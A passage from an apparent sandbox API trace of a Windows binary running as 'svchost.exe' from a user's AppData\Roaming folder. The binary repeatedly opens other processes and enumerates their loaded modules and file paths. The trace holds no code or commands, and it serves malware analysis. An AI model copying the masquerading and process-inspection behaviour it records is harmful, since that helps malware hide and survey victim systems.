EntryPoint=0x7feff450760)) returned 1 [0074.497] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.497] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0074.498] CoTaskMemFree (pv=0xd910e0) [0074.498] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.498] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0074.499] CoTaskMemFree (pv=0xd910e0) [0074.499] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2427560, cb=0x18 | out: lpmodinfo=0x2427560*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0074.500] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.500] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0074.501] CoTaskMemFree (pv=0xd910e0) [0074.501] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.502] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0074.503] CoTaskMemFree (pv=0xd910e0) [0074.503] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2429720, cb=0x18 | out: lpmodinfo=0x2429720*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0074.504] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.504] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0074.505] CoTaskMemFree (pv=0xd910e0) [0074.505] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.505] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0074.506] CoTaskMemFree (pv=0xd910e0) [0074.506] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x242b9f8, cb=0x18 | out: lpmodinfo=0x242b9f8*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0074.507] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.508] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0074.509] CoTaskMemFree (pv=0xd910e0) [0074.509] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.509] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0074.510] CoTaskMemFree (pv=0xd910e0) [0074.510] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x242dbb8, cb=0x18 | out: lpmodinfo=0x242dbb8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0074.512] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.512] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0074.513] CoTaskMemFree (pv=0xd910e0) [0074.513] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.513] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0074.514] CoTaskMemFree (pv=0xd910e0) [0074.514] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x242fd68, cb=0x18 | out: lpmodinfo=0x242fd68*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0074.516] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.516] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0074.517] CoTaskMemFree (pv=0xd910e0) [0074.517] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.517] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0074.519] CoTaskMemFree (pv=0xd910e0) [0074.519] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2431f28, cb=0x18 | out: lpmodinfo=0x2431f28*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0074.520] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.520] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="user32.dll") returned 0xa [0074.521] CoTaskMemFree (pv=0xd910e0) [0074.522] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.522] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0074.523] CoTaskMemFree (pv=0xd910e0) [0074.523] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x24340e8, cb=0x18 | out: lpmodinfo=0x24340e8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0074.524] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.524] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0074.526] CoTaskMemFree (pv=0xd910e0) [0074.526] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.526] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0074.527] CoTaskMemFree (pv=0xd910e0) [0074.527] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24362a8, cb=0x18 | out: lpmodinfo=0x24362a8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0074.529] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.529] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0074.530] CoTaskMemFree (pv=0xd910e0) [0074.530] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.530] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0074.532] CoTaskMemFree (pv=0xd910e0) [0074.532] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2438458, cb=0x18 | out: lpmodinfo=0x2438458*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0074.533] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.533] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0074.535] CoTaskMemFree (pv=0xd910e0) [0074.535] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.535] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0074.537] CoTaskMemFree (pv=0xd910e0) [0074.537] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x243a618, cb=0x18 | out: lpmodinfo=0x243a618*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0074.538] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.538] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0074.541] CoTaskMemFree (pv=0xd910e0) [0074.541] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.541] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0074.543] CoTaskMemFree (pv=0xd910e0) [0074.543] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x243c7d8, cb=0x18 | out: lpmodinfo=0x243c7d8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0074.544] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.544] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0074.546] CoTaskMemFree (pv=0xd910e0) [0074.546] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.546] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0074.548] CoTaskMemFree (pv=0xd910e0) [0074.548] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x243e998, cb=0x18 | out: lpmodinfo=0x243e998*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0074.550] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.550] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0074.551] CoTaskMemFree (pv=0xd910e0) [0074.551] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.551] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0074.553] CoTaskMemFree (pv=0xd910e0) [0074.553] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x2440b68, cb=0x18 | out: lpmodinfo=0x2440b68*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0074.555] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.555] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0074.557] CoTaskMemFree (pv=0xd910e0) [0074.557] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.557] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0074.558] CoTaskMemFree (pv=0xd910e0) [0074.558] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc950000, lpmodinfo=0x2442d28, cb=0x18 | out: lpmodinfo=0x2442d28*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0074.560] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.560] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0074.562] CoTaskMemFree (pv=0xd910e0) [0074.562] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.562] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0074.564] CoTaskMemFree (pv=0xd910e0) [0074.564] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2444ef8, cb=0x18 | out: lpmodinfo=0x2444ef8*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0074.566] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.566] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0074.568] CoTaskMemFree (pv=0xd910e0) [0074.568] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.568] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0074.570] CoTaskMemFree (pv=0xd910e0) [0074.570] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x24470d0, cb=0x18 | out: lpmodinfo=0x24470d0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0074.572] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.572] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0074.574] CoTaskMemFree (pv=0xd910e0) [0074.574] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.574] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0074.576] CoTaskMemFree (pv=0xd910e0) [0074.576] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2449290, cb=0x18 | out: lpmodinfo=0x2449290*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0074.577] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.577] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0074.579] CoTaskMemFree (pv=0xd910e0) [0074.579] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.579] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0074.581] CoTaskMemFree (pv=0xd910e0) [0074.581] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x244b450, cb=0x18 | out: lpmodinfo=0x244b450*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0074.583] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.583] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0074.586] CoTaskMemFree (pv=0xd910e0) [0074.586] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.586] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0074.588] CoTaskMemFree (pv=0xd910e0) [0074.588] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac50000, lpmodinfo=0x244d838, cb=0x18 | out: lpmodinfo=0x244d838*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0074.590] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.590] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0074.592] CoTaskMemFree (pv=0xd910e0) [0074.592] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.592] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0074.594] CoTaskMemFree (pv=0xd910e0) [0074.594] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x244fa08, cb=0x18 | out: lpmodinfo=0x244fa08*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0074.596] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.596] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0074.598] CoTaskMemFree (pv=0xd910e0) [0074.598] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.599] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0074.601] CoTaskMemFree (pv=0xd910e0) [0074.601] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x2451bd8, cb=0x18 | out: lpmodinfo=0x2451bd8*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0074.603] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.603] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0074.605] CoTaskMemFree (pv=0xd910e0) [0074.605] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.605] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0074.607] CoTaskMemFree (pv=0xd910e0) [0074.607] CloseHandle (hObject=0x214) returned 1 [0074.613] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x214 [0074.613] EnumProcessModules (in: hProcess=0x214, lphModule=0x2454d38, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2454d38, lpcbNeeded=0x23ee40) returned 1 [0074.614] GetModuleInformation (in: hProcess=0x214, hModule=0x47e00000, lpmodinfo=0x2454fa8, cb=0x18 | out: lpmodinfo=0x2454fa8*(lpBaseOfDll=0x47e00000, SizeOfImage=0x20000, EntryPoint=0x47e17d90)) returned 1 [0074.615] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.615] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x47e00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="smss.exe") returned 0x8 [0074.616] CoTaskMemFree (pv=0xd910e0) [0074.616] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.616] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x47e00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="\\SystemRoot\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe")) returned 0x1d [0074.618] CoTaskMemFree (pv=0xd910e0) [0074.619] CoTaskMemAlloc (cb=0x20c) returned 0xd57ef0 [0074.619] GetSystemDirectoryW (in: lpBuffer=0xd57ef0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0074.619] CoTaskMemFree (pv=0xd57ef0) [0074.620] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2457758, cb=0x18 | out: lpmodinfo=0x2457758*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.621] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.621] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.623] CoTaskMemFree (pv=0xd910e0) [0074.623] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.623] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.624] CoTaskMemFree (pv=0xd910e0) [0074.624] CloseHandle (hObject=0x214) returned 1 [0074.625] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.625] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x214 [0074.625] EnumProcessModules (in: hProcess=0x214, lphModule=0x2459d18, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2459d18, lpcbNeeded=0x23ee40) returned 1 [0074.627] GetModuleInformation (in: hProcess=0x214, hModule=0xff550000, lpmodinfo=0x2459f88, cb=0x18 | out: lpmodinfo=0x2459f88*(lpBaseOfDll=0xff550000, SizeOfImage=0x53000, EntryPoint=0xff563310)) returned 1 [0074.627] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.627] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff550000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="services.exe") returned 0xc [0074.628] CoTaskMemFree (pv=0xd910e0) [0074.628] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.628] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff550000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")) returned 0x20 [0074.628] CoTaskMemFree (pv=0xd910e0) [0074.628] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x245c190, cb=0x18 | out: lpmodinfo=0x245c190*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.628] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.628] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.629] CoTaskMemFree (pv=0xd910e0) [0074.629] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.629] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.629] CoTaskMemFree (pv=0xd910e0) [0074.630] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x245e350, cb=0x18 | out: lpmodinfo=0x245e350*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0074.630] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.630] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0074.630] CoTaskMemFree (pv=0xd910e0) [0074.630] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.630] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0074.631] CoTaskMemFree (pv=0xd910e0) [0074.631] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2460520, cb=0x18 | out: lpmodinfo=0x2460520*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0074.631] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.631] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0074.632] CoTaskMemFree (pv=0xd910e0) [0074.632] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.632] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0074.633] CoTaskMemFree (pv=0xd910e0) [0074.633] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24626f0, cb=0x18 | out: lpmodinfo=0x24626f0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0074.633] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.633] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0074.634] CoTaskMemFree (pv=0xd910e0) [0074.634] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.634] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0074.635] CoTaskMemFree (pv=0xd910e0) [0074.635] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2464908, cb=0x18 | out: lpmodinfo=0x2464908*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0074.636] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.636] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0074.636] CoTaskMemFree (pv=0xd910e0) [0074.636] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.636] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0074.637] CoTaskMemFree (pv=0xd910e0) [0074.637] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2466ac8, cb=0x18 | out: lpmodinfo=0x2466ac8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0074.638] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 